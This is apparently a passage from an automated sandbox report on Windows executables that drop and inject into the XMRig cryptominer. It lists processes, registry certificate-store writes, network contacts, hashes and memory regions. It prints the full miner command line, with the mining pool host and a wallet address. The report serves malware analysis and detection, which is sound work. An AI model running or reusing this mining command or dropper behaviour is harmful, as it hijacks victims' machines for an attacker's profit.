12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3960 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3960 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3720 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3860 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1920-16-0x0000021F6D3F0000-0x0000021F6D410000-memory.dmp
memory/1920-17-0x0000021F6D450000-0x0000021F6D470000-memory.dmp
memory/1920-18-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-19-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-20-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-21-0x0000021F6D470000-0x0000021F6D490000-memory.dmp
memory/1920-22-0x0000021F6D490000-0x0000021F6D4B0000-memory.dmp
memory/1920-23-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-24-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-27-0x0000021F6D490000-0x0000021F6D4B0000-memory.dmp
memory/1920-26-0x0000021F6D470000-0x0000021F6D490000-memory.dmp
memory/1920-25-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-28-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-29-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-30-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-31-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-32-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-33-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-34-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-35-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-36-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-37-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-38-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-39-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-40-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-41-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-42-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-43-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-44-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-45-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-46-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-47-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-48-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-49-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-50-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-51-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-52-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-53-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-54-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-55-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-56-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-57-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-58-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-59-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-60-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-61-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-62-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-63-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-64-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-65-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-66-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-67-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-68-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-69-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-70-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-71-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-72-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-73-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-74-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-75-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-76-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-77-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-78-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-79-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-80-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-81-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-82-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-83-0x00007FF673D10000-0x00007FF674813000-memory.dmp
memory/1920-84-0x00007FF673D10000-0x00007FF674813000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4840 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/916-16-0x00000219C99A0000-0x00000219C99C0000-memory.dmp
memory/916-17-0x00000219CB4C0000-0x00000219CB4E0000-memory.dmp
memory/916-18-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-20-0x00000219CB500000-0x00000219CB520000-memory.dmp
memory/916-19-0x00000219CB4E0000-0x00000219CB500000-memory.dmp
memory/916-21-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-22-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-25-0x00000219CB500000-0x00000219CB520000-memory.dmp
memory/916-24-0x00000219CB4E0000-0x00000219CB500000-memory.dmp
memory/916-23-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-26-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-27-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-28-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-29-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-30-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-31-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-32-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-33-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-34-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-35-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-36-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-37-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-38-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-39-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-40-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-41-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-42-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-43-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-44-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-45-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-46-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-47-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-48-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-49-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-50-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-51-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
